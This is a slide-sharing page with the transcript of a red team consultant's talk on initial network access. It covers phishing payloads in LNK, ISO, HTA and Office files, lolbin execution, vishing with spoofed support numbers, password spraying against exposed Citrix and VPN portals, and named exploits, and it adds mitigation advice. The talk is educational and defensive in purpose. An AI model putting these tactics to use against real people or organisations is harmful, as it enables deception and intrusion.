Understanding Network Breaches: Methods and Mitigation

Discover how networks are breached through phishing, exposed services, and publicly available exploits as explained by a security consultant. Learn about phishing techniques, externally exposed services vulnerabilities, and common exploits used to gain unauthorized access. Explore ways to mitigate these risks and insights into threat actor tactics for breaching network security.

• Network Security
• Breach Methods
• Phishing
• Exploits
• Cybersecurity

kcass Follow

Uploaded on Dec 05, 2024 | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. Download presentation by click this link. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

Presentation Transcript

1. How Networks Are Breached

2. Whoami Security Consultant at Rapid7 Responsible for delivering penetration testing and Red Team services. Previously worked for State Farm and Rhino Security Labs Currently spend time trying to build out our Red Team tooling including ways to gain access to internal networks while remaining stealthy

3. Purpose of Talk Talk about some of the way I and colleagues gained access to companies internal networks via Red Team engagements. Methods used: Phishing Externally exposed services Publically available exploits Briefly talk about some ways this can be mitigated. Briefly touch on how threat actors also abuse some of these methods. Not a threat hunter, this is from the lens of a Red Teamer.

4. Phishing Phishing comes in shapes and sizes Phishing / Spear Phishing: Broad or targeted campaigns designed to coerce users to provide credentials and or run malware on their computer. Vhishing: Voice phishing, trying to coerce someone on the phone to provide their credentials or run malware. Physical social engineering: Physically trying to enter a target building.

5. Externally Exposed Services Citrix Spray credentials against a Citrix portal and potentially gain access to applications that can be escaped, etc VPN s Using credentials gained from spraying or another method authenticate to the externally exposed VPN Email services While email services may not directly provide access to an internal network if MFA is not enabled, an attacker can use this access to send more convincing phishing campaigns.

6. Publicly Available Exploits Log4Shell Eternal Blue Blue Keep Citrix NetScaler

7. How is Access Gained Through Phishing From a Red Team perspective, phishing is targeted to one organization and is tailored to trick employees of that organization. Goal in most cases is to get employees to provide credentials and run our initial access payload. Some threat actor phishing campaigns may be simple and generic. Example, emotet spam messages.

8. How is Access Gained Through Phishing In the context of emails payloads may be included as attachments or for download via a malicious link. From a red team perspective, payloads will be hidden behind a cloned login page to give the illusion they are coming from a legitimate source. Techniques such as HTML smuggling may be used to get around proxies blocking certain file types.

9. What do Malicious Files Contain A very popular method for Red Teams and threat actors has been to package payloads into an ISO or ZIP file that contains a Windows Shortcut file. Bypasses MOTW propagation. May be more convincing. Technique used by groups such as Emotet and Qakbot To bypass application white listing, the Windows Shortcut file may be configured to execute a payload using a Windows lolbin (living off the land binary) Microsoft signed binaries that can be used to execute code. RegSvcs.exe, InstallUtil.exe, rundll32.exe, regsvr32.exe

10. Example: Emotet Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files- malware/

11. Example: Believed to be APT29 Source: https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/

12. Other File Types Some other popular file types to distribute malware for initial access are: HTA HTML application containing VBscript or JScript that executes a payload on a users computer EXE Raw executable files may also be used Office documents Office documents containing VB macros or LNK files embedded within

13. How is Access Gained Through Vishing Call users and convince them to visit a webpage hosting your malicious payload Disguise it as an urgent security patch Spoof tech support phone number if you can get ahold of it

14. How is Access Gained Through Physical Social Engineering Tailgating someone to gain access to unauthorized spaces Lockpicking to gain access to unauthorized spaces Posing as a support person, etc. Once inside plug a dropbox into the network.

15. Some Mitigations Deploy Endpoint Detection and Response Ensure mitigations such as application whitelisting are enabled and properly set up Consider adding common Windows lolbins such as mshta.exe if it is not utilizing within your environment Block the download of common malicious file types if possible .HTA, .ISO Setup email filters to block some malicious emails from coming in Dont allow uncategorized domains Dont allow typo-squatted domains Dont allow newly registered domains

16. How is Access Gained Through External Applications Externally exposed applications can provide a ton of useful application to an attacker Some applications utilize users domain credentials and can allow for password spraying. Some applications also allow for user enumeration which can help narrow down a list of actual usernames for phishing / password spraying

17. How is Access Gained Through External Applications Some applications that are exposed without MFA or other protections may be utilized to gain access to an internal network. Citrix When exposed to the internet and lacking something such as MFA Citrix may be able to provide initial access Used by groups like FIN5 and OilRig according to mitre VPN With valid credentials it may be possible to authenticate to a VPN and gain access to the internal network Used by groups such as APT29 and Dragonfly according to mitre

18. Possible Mitigations Applications that don t need to be exposed to the internet should not be Applications that need to be exposed to the internet should require some form of MFA or secure authentication such as certificates.

19. How is External Access Gained via Publicly Available Exploits A highly exploitable and available application gets exposed for having a critical vulnerability that allows for remote code execution. These vulnerabilities may be abused to gain access to internal networks by exploiting the vulnerability to download and execute some malware.

20. Common Examples Log4j / Log4Shell Vulnerability in a very common Java logging system Was abused to drop cryptominers, botnets, and Cobalt Strike beacons. Eternal Blue / Blue Keep Publicly exposed SMB or RDP services were vulnerable to remote code execution Eternal blue most commonly known from the Wannacry ransomware attack. Citrix NetScaler A remote code execution vulnerability existed in Citrix netscaler

21. Possible Mitigations Ensure proper patch is applied when released. Monitor vulnerable devices for any IOC s related to that vulnerability. Pray the patch works.

22. Conclusion There are many ways to perform initial access. Preventing everything can be tricky however threat hunting feeds can be extremely useful for understanding the current methods used by a variety of threat actors. Leverage resources like Mitre to learn different TTP s and Mitigations you can possibly employ